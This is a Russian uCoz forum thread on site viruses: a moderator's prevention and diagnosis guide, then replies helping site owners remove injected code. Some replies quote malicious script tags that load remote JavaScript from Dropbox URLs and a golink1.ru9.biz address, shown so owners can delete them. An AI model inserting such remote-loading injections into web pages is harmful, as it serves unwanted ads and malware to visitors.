Модератор форума: Yuri_G  
Сообщество uCoz » Мастерская uCoz » Безопасность сайта » Вирусы на сайтах (предотвращение, диагностика)
Вирусы на сайтах
Модератор форума
Сообщение # 1 | 22:08:04 21 Июн 2010
Как предотвратить попадание вредоносных ссылок на сайт

  • Первое и самое главное - это запрещать использование у вас на сайте HTML тегов для всех групп пользователей, кроме администратора.

  • Запретить BB коды в чате всем группам пользователей, запрещать использование BB-коды [url]и [img], так же можно запретить использование BB кодов в гостевой и комментариях.

  • В комментариях, гостевой книге, на форуме и в мини-чате запрещать функцию Автоматически делать ссылками www и email адреса

  • Всегда помнить, что тег iframe считается потенциально опасным, и быть очень осторожным при вставке партнерок и рекламных блоков через iframe. На юкозе используются два ифрейма: это рекламный баннер и мини-чат. Это безопасные ифреймы.

  • Очень осторожно выбирать баннерные сети партнерки с рекламными блоками на сайт.




Диагностика

  • Если случилось так, что ваш антивирус или антивирусы ваших пользователей "реагируют" на ваш сайт, а так же если браузер Mozilla Firefox ставит заглушку-предупреждение на ваш сайт, а Google в выдаче метит ваш сайт, как тот, который может нанести вред вашему компьютеру, а вебмастер Яндекса высылает вам предупреждение о том, что ваш сайт заражён...
    В первую очередь нужно ознакомиться с аллертами антивируса. Большинство антивирусов выдают достаточно полную информацию о блокировке того или иного объекта на сайте, так же заглушка Firefox-а и вебмастер Google и Яндекса имеют описания вредоносного кода обнаруженного у вас на сайтеБывает так, что ваш сайт не заражен, а мог быть заражен сайт, который крутится у вас в рекламе (чаще всего такое случается с баннерными сетями или партнерками по обмену трафиком ), тем не менее вы можете получить аллерт антивируса. Сложность диагностики таких аллертов состоит в том, что баннеры и сайты подгружаемые кодом подобных партнерок могут постоянно меняться. Если вредоносный код обнаруживается у вас на сайте, тогда поисковики могут наложить фильтр на ваш сайт. Выглядит это так, что в выдаче под ссылкой на ваш сайт будет предупреждение о том, что сайт может нанести вред вашему компьютеру, а браузер Mozilla Firefox или Google Chrome или Opera будет при этом выдавать заглушку - предупреждение. В этом случае даже если сайт будет полностью очищен от вредоносного кода такие фильтры и заглушки могут висеть ещё очень долго. Чем быстрее будет очищен сайт - тем быстрее будет снят фильтр, а так же заглушки с браузеров
  • Если ваш сёрфинг по интернету сопровождается постоянной навязчивой рекламой, если вы на многих сайтах видите одну и ту же рекламу и видите её только вы (другие пользователи не наблюдают подобных отклонений), если вы пишете сообщения на форумах, чатах, гостевых и т.д и в ваши сообщения встраиваются посторонние ссылки или рекламные объявления, то есть если у вас сходные отклонения не на одном, а на целой серии различных сайтов, то стоит очистить свой компьютер от вирусов.
  • Если вдруг у вас на сайте появилось всплывающее окно, что-то на подобии формы входа, где нужно ввести логин и пароль, то естественно свои данные вводить не стоит, а стоит присмотреться к всплывающему окну, а именно к его адресу или заголовку. Адрес или заголовок такого окна всегда отличен от адреса и заголовка вашего сайта.
    Для поиска транслятора всплывающего окна нужно проверить все модули, где у вас разрешен BB код для пользователей. Чаще всего подобное подсаживают через мини-чат с разрешенными BB-кодами в нем. Ваша задача найти инородную картинку (чаще всего смайлик)


Правила подачи заявки на диагностику и поиск вредоносного кода на сайте

  • Вы должны предоставить ссылку на сайт!

  • Вы должны дать описание проблемы:

    1) на какой странице сайта обнаруживается проблема (ссылка)

    2) проблема обнаруживается только под логином или под гостем тоже

    3) если реагирует антивирус, то назовите свой антивирус, и предоставьте текст или четкий скриншот блокировки

    4) если сайт блокируется браузером, то назовите свой браузер и предоставьте текст блокировки


    Полезные ссылки:


    Так как большинство случаев заражения сайтов является плодом неумелого обращения с готовыми скриптами, а так же с готовыми элементами дизайна для сайтов найденными в сети, то перед тем как внедрить на сайт найденный в сети скрипт стоит ознакомиться со следующими темами:


    strannik9513
    Сообщений: 5
    Репутация: 0

    Сообщение # 301 | 21:22:20 14 Июл 2013
    И все таки это опасно значит надо обороняться от попадания вирусов в сайт, а нет такой возможности иметь на сайте свой антивирусник?
    webanet
    Сообщений: 24067
    Репутация: 4985

    Сообщение # 302 | 21:43:31 14 Июл 2013
    strannik9513,
    Цитата
    И все таки это опасно значит надо обороняться от попадания вирусов в сайт
    это оборона от самого себя? самое слабое звено - это администрация сайта. не ставьте сторонние скрипты, особенно с подгрузкой с чужих сайтов. не разгуливайте по системе своим uID профилем, которым администрируете сайт, особенно не вводите uID пароль в измененные формы входа и так далее. в этом разделе все описано. читайте темы
    Цитата
    а нет такой возможности иметь на сайте свой антивирусник?
    антивирусов для сайтов нет
    ТУТ можно оставить своё мнение по любому вопросу
    https://webanetlabs.net/
    oooregoil
    Сообщений: 20
    Репутация: 0

    Сообщение # 303 | 09:12:43 15 Июл 2013
    oooregoil.narod.ru как убрать ссылки и банеры?
    zuzikisa
    Сообщений: 26
    Репутация: 2

    Сообщение # 304 | 10:48:47 15 Июл 2013
    у нас тоже появилась сторонняя реклама....огромные такие банеры и даже порнографические ссылки.
    обычно появляются , при первом заходе на сайт.
    http://hrithikroshan-best.ru/
    oooregoil
    Сообщений: 20
    Репутация: 0

    Сообщение # 305 | 11:13:54 15 Июл 2013
    как убрать эти ссылки с сайта oooregoil.narod.ru
    z1MO_oK
    Сообщений: 295
    Репутация: 8

    Сообщение # 306 | 11:41:54 15 Июл 2013
    На каждой странице уберите в <head> эти строчки:
    Код
    <script type="text/javascript" src="[url=https://dl.dropboxusercontent.com/s/g5zffknmr8da4tp/update.txt]https://dl.dropboxusercontent.com/s/g5zffknmr8da4tp/update.txt[/url]"></script><script type="text/javascript" src="[url=https://dl.dropboxusercontent.com/s/4lgd2g170q96tq3/menu-v2.txt]https://dl.dropboxusercontent.com/s/4lgd2g170q96tq3/menu-v2.txt[/url]"></script><script type="text/javascript" src="[url=https://dl.dropboxusercontent.com/s/4f9eakzpj17n2yw/shapka.txt]https://dl.dropboxusercontent.com/s/4f9eakzpj17n2yw/shapka.txt[/url]"></script>
    oooregoil

    Добавлено (15 Июл 2013, 11:41:54)
    ---------------------------------------------
    zuzikisa, тоже самое, убираем в <head>

    Код
    <script type="text/javascript" src="[url=https://dl.dropboxusercontent.com/s/g5zffknmr8da4tp/update.txt]https://dl.dropboxusercontent.com/s/g5zffknmr8da4tp/update.txt[/url]"></script><script type="text/javascript" src="[url=https://dl.dropboxusercontent.com/s/4lgd2g170q96tq3/menu-v2.txt]https://dl.dropboxusercontent.com/s/4lgd2g170q96tq3/menu-v2.txt[/url]"></script><script type="text/javascript" src="[url=https://dl.dropboxusercontent.com/s/4f9eakzpj17n2yw/shapka.txt]https://dl.dropboxusercontent.com/s/4f9eakzpj17n2yw/shapka.txt[/url]"></script>
    oooregoil
    Сообщений: 20
    Репутация: 0

    Сообщение # 307 | 13:18:31 15 Июл 2013
    а как это сделать? просто я чайник
    Деееенчик
    Сообщений: 190
    Репутация: 116

    Сообщение # 308 | 13:20:30 15 Июл 2013
    oooregoil, в ПУ,управление дизайном,и дальше выбирайте нужные страницы и находите код,или с помощью быстрой замены.
    Благодарности в репутацию и в награды!
    P.S Плюс под аватаркой)
    oooregoil
    Сообщений: 20
    Репутация: 0

    Сообщение # 309 | 13:25:21 15 Июл 2013
    и как сделать что бы ссылки и реклама вообще не появлялась??? я ничего сам не добавлял, пароль месяц назад поменял никому его не давал, эти ссылки убираю и каждые две недели они опять появляются
    webanet
    Сообщений: 24067
    Репутация: 4985

    Сообщение # 310 | 18:03:08 15 Июл 2013
    oooregoil, вот так надо сделать //forum.ucoz.ru/forum/45-34556-1050949-16-1372849337
    ТУТ можно оставить своё мнение по любому вопросу
    https://webanetlabs.net/
    oooregoil
    Сообщений: 20
    Репутация: 0

    Сообщение # 311 | 11:29:34 16 Июл 2013
    спасибо надеюсь поможет
    zuzikisa
    Сообщений: 26
    Репутация: 2

    Сообщение # 312 | 21:22:14 16 Июл 2013
    z1MO_oK, у меня нет приведенного выше зловредного скрипта в настройках...а порно реклама лезит.
    есть только такой в <head> <script type="text/javascript" src="https://dl.dropboxusercontent.com/s/g5zffknmr8da4tp/update.txt"></script><script type="text/javascript" src="https://dl.dropboxusercontent.com/s/4lgd2g170q96tq3/menu-v2.txt"></script><script type="text/javascript" src="https://dl.dropboxusercontent.com/s/4f9eakzpj17n2yw/shapka.txt"></script>

    это оно? не пойму..запуталась в цифрах.
    Сообщение отредактировал zuzikisa - Вторник, 16 Июл 2013, 21:23:27
    webanet
    Сообщений: 24067
    Репутация: 4985

    Сообщение # 313 | 21:27:54 16 Июл 2013
    zuzikisa, это оно. удаляйте. и меняйте пароль uid профиля, которым администрируете сайт
    ТУТ можно оставить своё мнение по любому вопросу
    https://webanetlabs.net/
    RedDog
    Сообщений: 8
    Репутация: 0

    Сообщение # 314 | 11:51:00 18 Июл 2013
    Здравствуйте. У нашем сайте уже который день вредоносный код. Те пользователи,у которых Касперский не могут войти на сайт. У меня NOD на работе пропускает,но через некоторое время работы с сайтом загружает страницу,что на скриншоте.
    Адрес сайта: http://vinogradova-tm.ru/
    Помогите решить проблему,пожалуйста!
    Прикрепления: 2483141.jpg (267.6 Kb)
    bandjuk
    Сообщений: 6816
    Репутация: 2398
    Уровень замечаний:

    Сообщение # 315 | 11:57:48 18 Июл 2013
    RedDog, в шаблоне "Страницы сайта" удаляй скрипт:
    <script language="javascript" src="http://golink1.ru9.biz/js/back.php?id=43"></script>
    Сообщество uCoz » Мастерская uCoz » Безопасность сайта » Вирусы на сайтах (предотвращение, диагностика)
    Поиск: